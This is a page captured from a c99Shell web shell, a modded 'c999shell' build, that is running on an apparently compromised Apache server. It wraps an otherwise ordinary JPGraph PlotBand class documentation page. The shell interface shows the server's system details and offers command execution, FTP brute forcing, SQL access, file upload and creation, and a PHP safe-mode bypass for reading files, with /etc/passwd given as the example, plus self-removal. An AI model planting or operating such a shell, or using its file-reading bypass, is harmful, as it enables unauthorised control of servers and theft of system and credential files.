!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/ref/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     PlotBand.html (10.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

CLASS PlotBand
(Defined in: jpgraph.php : 8583)
 PlotBand 
 PlotBand() 
 SetDensity() 
 SetOrder() 
 ShowFrame() 
 

Class usage and Overview
A "Plotband" repesent a rectangualr area in the graph that can be given a specific pattern ranging from 3D grid to simple horizntal grid lines.

A Plot band is then added to the graph via the Graph::AddBand() method.

 

See also related classes:
Graph

 


Class Methods

 

 

Create a new Plot band of the specified type

ArgumentDefaultDescription
$aDir  Direction of plot band
$aPattern  Type of pattern
$aMin  Min value for plot area
$aMax  Max value for plot area
$aColor "black" Color of pattern
$aWeight 1 Line weight
$aDepth DEPTH_BACK Depth. Over or under the plot.

Description
Create a new Plot band that later on can be added to the graph. The following pattern types are supported
  • BAND_RDIAG, Right diagonal lines
  • BAND_LDIAG, Left diagonal lines
  • BAND_SOLID, Solid one color
  • BAND_LVERT, Vertical lines
  • BAND_LHOR, Horizontal lines
  • BAND_VLINE, Vertical lines
  • BAND_HLINE, Horizontal lines
  • BAND_3DPLANE, "3D" Plane
  • BAND_HVCROSS, Vertical/Hor crosses
  • BAND_DIAGCROSS, Diagonal crosses
A plotband extends completely along one of the axis in the graph. This axis is determined by the first argument, the direction. Valid directions are
  1. HORIZONTAL
  2. VERTICAL
 

Example

$uband=new PlotBand(HORIZONTAL,BAND_RDIAG,0,"max","green");
$uband->ShowFrame(false);
$uband->SetDensity(50); // 50% line density
$lband=new PlotBand(HORIZONTAL,BAND_LDIAG,"min",0,"red");
$lband->ShowFrame(false);
$lband->SetDensity(20); // 20% line density

$graph->AddBand($uband);
$graph->AddBand($lband);

 

 

Specify density for pattern

ArgumentDefaultDescription
$aDens  Density [1,100]

Description
Specify density for pattern as an integer value between 1 and 100, 100 being very dense and 1 being very sparse.  

Example

$uband=new PlotBand(HORIZONTAL,BAND_RDIAG,0,"max","green");
$uband->ShowFrame(false);
$uband->SetDensity(50); // 50% line density
$lband=new PlotBand(HORIZONTAL,BAND_LDIAG,"min",0,"red");
$lband->ShowFrame(false);
$lband->SetDensity(20); // 20% line density

$graph->AddBand($uband);
$graph->AddBand($lband);

 

 

Specify z-order parameter for plot

ArgumentDefaultDescription
$aDepth  Pattern Z-order parameter

Description
Specify if the pattern should be in front of plot or behind the plot. Valid parameters are
  • DEPTH_BACK, Behind the plot
  • DEPTH_FRONT, In front of the plot
 

Example

$band=new PlotBand(HORIZONTAL,BAND_RDIAG,0,"max","green");
$band->ShowFrame(false);
$band->SetOrder(DEPTH_BACK);
$graph->AddBand($band);

 

 

Display frame around pattern

ArgumentDefaultDescription
$aFlag true True=Display border

Description
Display frame around pattern 

Example

$band=new PlotBand(HORIZONTAL,BAND_RDIAG,0,"max","green");
$band->ShowFrame(false);
$band->SetOrder(DEPTH_BACK);
$graph->AddBand($band);



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0047 ]--